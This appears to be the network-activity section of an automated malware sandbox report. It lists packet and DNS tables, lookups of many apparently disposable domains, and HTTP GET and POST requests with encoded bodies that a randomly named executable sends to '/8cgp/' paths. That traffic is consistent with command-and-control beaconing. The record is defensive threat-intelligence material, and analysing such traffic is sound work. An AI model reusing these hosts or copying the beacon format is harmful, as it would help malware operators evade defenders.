                                                                    Apr 24, 2024 12:34:55.698875904 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.702059984 CEST5033080192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:34:55.871402979 CEST8050330108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:35:01.558796883 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:01.893593073 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:01.893747091 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:01.895152092 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.229820967 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230283976 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230298996 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230393887 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230407953 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230420113 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230437040 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230448008 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230458975 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230468035 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:02.230623007 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.230623007 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.233844995 CEST5033180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:35:02.568445921 CEST805033184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:35:07.245038986 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.526490927 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.526711941 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.528105021 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.809379101 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.810910940 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.810924053 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:07.811234951 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:07.813107967 CEST5033280192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:35:08.094558001 CEST8050332118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:35:12.821943045 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.103594065 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.103799105 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.105195999 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.377888918 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.385056019 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.579597950 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.579746962 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:13.580049992 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.581937075 CEST5033380192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:35:13.863535881 CEST8050333157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:35:23.757350922 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:23.934833050 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:23.935041904 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:23.936424971 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.113105059 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.130976915 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.130990028 CEST8050334203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:35:24.131268024 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.133148909 CEST5033480192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:35:24.310206890 CEST8050334203.161.49.193192.168.11.20
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 24, 2024 12:27:26.259866953 CEST5077653192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:27:26.964096069 CEST53507761.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:27:58.720263004 CEST5964953192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:27:59.547804117 CEST53596491.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:28:20.225538015 CEST5337953192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:28:20.532402992 CEST53533791.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:28:34.691147089 CEST5863353192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:28:34.858701944 CEST53586331.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:28:42.907866955 CEST6058153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:28:43.076395988 CEST53605811.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:28:51.140491009 CEST5179753192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:28:51.831527948 CEST53517971.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:29:05.309112072 CEST5842053192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:29:05.536655903 CEST53584201.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:29:19.806176901 CEST6509853192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:29:20.414931059 CEST53650981.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:29:34.396563053 CEST6544053192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:29:34.872594118 CEST53654401.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:29:49.066517115 CEST5884853192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:29:49.234477997 CEST53588481.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:29:57.297667027 CEST5787453192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:29:57.468009949 CEST53578741.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:30:11.029062033 CEST6056553192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:30:11.418248892 CEST53605651.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:30:25.478991985 CEST6153853192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:30:25.793375969 CEST53615381.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:30:39.741508007 CEST5462153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:30:40.030802965 CEST53546211.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:30:54.755465984 CEST4915553192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:30:54.959846020 CEST53491551.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:31:09.610008001 CEST5592853192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:31:09.777997017 CEST53559281.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:31:17.827294111 CEST6068153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:31:18.368974924 CEST53606811.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:31:54.942539930 CEST6334253192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:31:55.112828016 CEST53633421.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:32:03.175292969 CEST6006153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:32:03.342045069 CEST53600611.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:33:07.254728079 CEST5439353192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:33:07.423139095 CEST53543931.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:33:28.954407930 CEST6322453192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:33:29.591080904 CEST53632241.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:33:43.779334068 CEST5996553192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:33:43.946839094 CEST53599651.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:33:51.996134996 CEST5366953192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:33:52.228579044 CEST53536691.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:06.368002892 CEST6236053192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:06.538747072 CEST53623601.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:19.988790035 CEST5631153192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:20.156210899 CEST53563111.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:45.014494896 CEST5188453192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:45.182399035 CEST53518841.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:34:50.185257912 CEST5178653192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:34:50.353069067 CEST53517861.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:35:18.585218906 CEST5515353192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:35:18.752221107 CEST53551531.1.1.1192.168.11.20
                                                                    Apr 24, 2024 12:35:34.536056995 CEST4989253192.168.11.201.1.1.1
                                                                    Apr 24, 2024 12:35:34.703178883 CEST53498921.1.1.1192.168.11.20
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Apr 24, 2024 12:27:26.259866953 CEST192.168.11.201.1.1.10x348bStandard query (0)absorbante-calitate.roA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:27:58.720263004 CEST192.168.11.201.1.1.10xf9fStandard query (0)www.arilyfarlico.ruA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:20.225538015 CEST192.168.11.201.1.1.10x70d3Standard query (0)www.donantedeovulos.spaceA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:34.691147089 CEST192.168.11.201.1.1.10x730eStandard query (0)www.lfsig.autosA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:42.907866955 CEST192.168.11.201.1.1.10x3013Standard query (0)www.muslimsmat.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:51.140491009 CEST192.168.11.201.1.1.10x52fStandard query (0)www.kader42.topA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:05.309112072 CEST192.168.11.201.1.1.10x6afStandard query (0)www.noispisok.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:19.806176901 CEST192.168.11.201.1.1.10x2e79Standard query (0)www.kansaiwoody.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:34.396563053 CEST192.168.11.201.1.1.10x2e52Standard query (0)www.a-two-spa-salon.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:49.066517115 CEST192.168.11.201.1.1.10xbca5Standard query (0)www.mxgovonline.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:57.297667027 CEST192.168.11.201.1.1.10x31fbStandard query (0)www.techfun.infoA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:11.029062033 CEST192.168.11.201.1.1.10x4203Standard query (0)www.ogunlewefamily.org.ngA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:25.478991985 CEST192.168.11.201.1.1.10x769eStandard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:39.741508007 CEST192.168.11.201.1.1.10xeeb7Standard query (0)www.nurenose.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:54.755465984 CEST192.168.11.201.1.1.10x2649Standard query (0)www.lm2ue.usA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:09.610008001 CEST192.168.11.201.1.1.10xfd80Standard query (0)www.weave.gameA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:17.827294111 CEST192.168.11.201.1.1.10xcbb0Standard query (0)www.whjzff.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:54.942539930 CEST192.168.11.201.1.1.10x2fe8Standard query (0)www.lfsig.autosA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:32:03.175292969 CEST192.168.11.201.1.1.10x176fStandard query (0)www.muslimsmat.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:07.254728079 CEST192.168.11.201.1.1.10x22c8Standard query (0)www.mxgovonline.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:28.954407930 CEST192.168.11.201.1.1.10xb896Standard query (0)www.badai77resmi.netA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:43.779334068 CEST192.168.11.201.1.1.10x564fStandard query (0)www.mxgovonline.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:51.996134996 CEST192.168.11.201.1.1.10x4a80Standard query (0)www.concretedailypress.netA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:06.368002892 CEST192.168.11.201.1.1.10x15afStandard query (0)www.berryandbird.co.ukA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:19.988790035 CEST192.168.11.201.1.1.10x64dbStandard query (0)www.weave.gameA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:45.014494896 CEST192.168.11.201.1.1.10xaaf7Standard query (0)www.lfsig.autosA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:50.185257912 CEST192.168.11.201.1.1.10xa98Standard query (0)www.muslimsmat.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:35:18.585218906 CEST192.168.11.201.1.1.10x598eStandard query (0)www.mxgovonline.comA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:35:34.536056995 CEST192.168.11.201.1.1.10x4445Standard query (0)www.fashionagencylab.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Apr 24, 2024 12:27:26.964096069 CEST1.1.1.1192.168.11.200x348bNo error (0)absorbante-calitate.ro37.251.143.215A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:27:59.547804117 CEST1.1.1.1192.168.11.200xf9fNo error (0)www.arilyfarlico.ru51.77.215.151A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:20.532402992 CEST1.1.1.1192.168.11.200x70d3No error (0)www.donantedeovulos.space64.190.62.22A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:34.858701944 CEST1.1.1.1192.168.11.200x730eName error (3)www.lfsig.autosnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:43.076395988 CEST1.1.1.1192.168.11.200x3013Name error (3)www.muslimsmat.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:28:51.831527948 CEST1.1.1.1192.168.11.200x52fNo error (0)www.kader42.top108.186.8.155A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:05.536655903 CEST1.1.1.1192.168.11.200x6afNo error (0)www.noispisok.comnoispisok.comCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:05.536655903 CEST1.1.1.1192.168.11.200x6afNo error (0)noispisok.com84.32.84.32A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:20.414931059 CEST1.1.1.1192.168.11.200x2e79No error (0)www.kansaiwoody.com118.27.122.214A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:34.872594118 CEST1.1.1.1192.168.11.200x2e52No error (0)www.a-two-spa-salon.com157.7.107.63A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:49.234477997 CEST1.1.1.1192.168.11.200xbca5Name error (3)www.mxgovonline.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:29:57.468009949 CEST1.1.1.1192.168.11.200x31fbNo error (0)www.techfun.info203.161.49.193A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:11.418248892 CEST1.1.1.1192.168.11.200x4203No error (0)www.ogunlewefamily.org.ngogunlewefamily.org.ngCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:11.418248892 CEST1.1.1.1192.168.11.200x4203No error (0)ogunlewefamily.org.ng67.225.140.26A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:25.793375969 CEST1.1.1.1192.168.11.200x769eNo error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:40.030802965 CEST1.1.1.1192.168.11.200xeeb7No error (0)www.nurenose.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:40.030802965 CEST1.1.1.1192.168.11.200xeeb7No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:30:54.959846020 CEST1.1.1.1192.168.11.200x2649No error (0)www.lm2ue.us91.195.240.123A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:09.777997017 CEST1.1.1.1192.168.11.200xfd80Name error (3)www.weave.gamenonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:18.368974924 CEST1.1.1.1192.168.11.200xcbb0No error (0)www.whjzff.com173.232.100.113A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:31:55.112828016 CEST1.1.1.1192.168.11.200x2fe8Name error (3)www.lfsig.autosnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:32:03.342045069 CEST1.1.1.1192.168.11.200x176fName error (3)www.muslimsmat.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:07.423139095 CEST1.1.1.1192.168.11.200x22c8Name error (3)www.mxgovonline.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:29.591080904 CEST1.1.1.1192.168.11.200xb896No error (0)www.badai77resmi.netbadai77resmi.netCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:29.591080904 CEST1.1.1.1192.168.11.200xb896No error (0)badai77resmi.net159.100.14.108A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:43.946839094 CEST1.1.1.1192.168.11.200x564fName error (3)www.mxgovonline.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:52.228579044 CEST1.1.1.1192.168.11.200x4a80No error (0)www.concretedailypress.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:33:52.228579044 CEST1.1.1.1192.168.11.200x4a80No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:06.538747072 CEST1.1.1.1192.168.11.200x15afNo error (0)www.berryandbird.co.ukberryandbird.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:06.538747072 CEST1.1.1.1192.168.11.200x15afNo error (0)berryandbird.co.uk76.223.105.230A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:06.538747072 CEST1.1.1.1192.168.11.200x15afNo error (0)berryandbird.co.uk13.248.243.5A (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:20.156210899 CEST1.1.1.1192.168.11.200x64dbName error (3)www.weave.gamenonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:45.182399035 CEST1.1.1.1192.168.11.200xaaf7Name error (3)www.lfsig.autosnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:34:50.353069067 CEST1.1.1.1192.168.11.200xa98Name error (3)www.muslimsmat.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:35:18.752221107 CEST1.1.1.1192.168.11.200x598eName error (3)www.mxgovonline.comnonenoneA (IP address)IN (0x0001)false
                                                                    Apr 24, 2024 12:35:34.703178883 CEST1.1.1.1192.168.11.200x4445Name error (3)www.fashionagencylab.comnonenoneA (IP address)IN (0x0001)false
                                                                    • absorbante-calitate.ro
                                                                    • www.arilyfarlico.ru
                                                                    • www.donantedeovulos.space
                                                                    • www.kader42.top
                                                                    • www.noispisok.com
                                                                    • www.kansaiwoody.com
                                                                    • www.a-two-spa-salon.com
                                                                    • www.techfun.info
                                                                    • www.ogunlewefamily.org.ng
                                                                    • www.387mfyr.sbs
                                                                    • www.nurenose.com
                                                                    • www.lm2ue.us
                                                                    • www.whjzff.com
                                                                    • www.concretedailypress.net
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.11.205024551.77.215.151807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:27:59.857388020 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:00.163288116 CEST197INHTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:28:00 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.11.205024664.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:20.846646070 CEST686OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 4b 54 6e 48 47 66 31 4b 78 4f 59 6a 64 77 79 70 2b 53 63 65 51 37 4a 34 34 67 4c 41 6b 52 32 42 52 61 6a 33 5a 66 42 63 56 38 43 4b 56 45 46 6d 51 43 42 38 33 52 78 2f 6f 39 39 62 37 47 75 39 72 46 61 6b 67 6f 5a 55 4d 6d 4f 32 63 49 39 36 69 7a 39 36 41 64 2f 6e 55 53 61 59 5a 51 30 6e 38 70 66 6f 4b 57 49 48 50 2b 68 4d 4d 71 75 4f 78 6d 43 66 76 64 69 33 7a 2b 33 68 6e 6a 54 76 47 45 65 63 70 6f 79 69 30 4b 2b 44 59 72 51 51 57 6e 58 6a 6e 4f 48 30 4b 79 49 32 78 59 6c 42 7a 4e 4b 57 43 30 6c 71 68 4e 71 2b 78 4f 30 4c 50 39 71 34 67 3d 3d
                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
                                                                    Apr 24, 2024 12:28:21.157947063 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:21 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.11.205024764.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:23.677385092 CEST1026OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 71 6a 6e 46 68 72 31 62 68 4f 62 73 39 77 79 6a 65 53 69 65 51 48 4a 34 38 35 54 44 52 68 32 47 7a 79 6a 32 59 66 42 51 31 38 43 66 6c 45 4d 6f 77 43 57 38 33 64 44 2f 74 46 39 62 37 53 75 38 59 4e 61 69 51 6f 57 63 73 6d 42 38 38 4a 36 2b 69 79 38 36 41 42 64 6e 56 32 61 59 70 73 30 67 2b 78 66 35 72 57 4c 43 76 2b 6e 64 73 71 76 42 52 6d 51 66 76 52 55 33 32 53 42 68 57 58 54 76 6c 38 65 53 4a 6f 31 34 30 4b 7a 63 49 71 43 61 7a 57 54 67 48 71 34 31 6f 43 75 2b 45 4d 4d 63 77 68 53 52 69 38 44 2b 78 6c 59 68 54 43 36 4b 63 34 41 73 65 62 53 47 49 48 2b 76 55 4d 4c 49 69 78 53 52 76 70 77 6c 2b 31 65 54 6f 76 66 75 4f 64 30 2b 6c 35 6a 4d 61 71 41 34 4a 4e 6a 4a 36 7a 46 76 46 32 4c 6a 64 70 59 7a 57 39 2b 41 48 49 75 33 56 55 55 77 5a 37 79 34 50 41 62 37 47 46 44 6d 64 36 4f 4f 77 70 71 67 4f 38 45 6e 46 32 30 46 41 72 2f 34 43 6c 2f 47 63 4d 65 59 35 72 44 38 46 6f 59 36 36 76 7a 30 75 30 75 2b 6b 71 6b 43 75 5a 34 31 50 75 47 56 38 74 43 44 74 77 70 2b 48 6d 39 63 75 56 71 51 48 70 42 6a 59 66 49 42 50 68 41 5a 58 41 44 31 36 45 30 32 67 39 58 7a 4f 76 6e 50 4e 72 47 4d 56 48 50 67 7a 79 62 6f 69 4f 4b 6b 69 4e 42 36 33 62 4a 67 59 67 30 43 65 44 42 36 43 56 4c 6e 57 35 74 72 4e 41 2f 64 5a 76 47 69 68 35 42 65 6c 6b 4b 4c 57 77 70 2b 49 68 66 79 4d 59 5a 77 41 43 73 5a 65 4f 77 53 6a 34 76 63 72 6d 6d 35 77 56 53 4f 59 4b 2b 61 4a 4c 62 2f 6b 62 7a 77 6f 56 6e 50 58 56 4d 62 30 48 73 44 4b 78 43 59 61 41 52 39 46 42 55 34 39 36 35 66 6f 53 4d 68 59 79 57 56 77 35 30 46 56 38 6c 53 73 4a 74 6e 6a 37 57 31 31 49 2b 5a 35 70 33 61 79 4d 3d
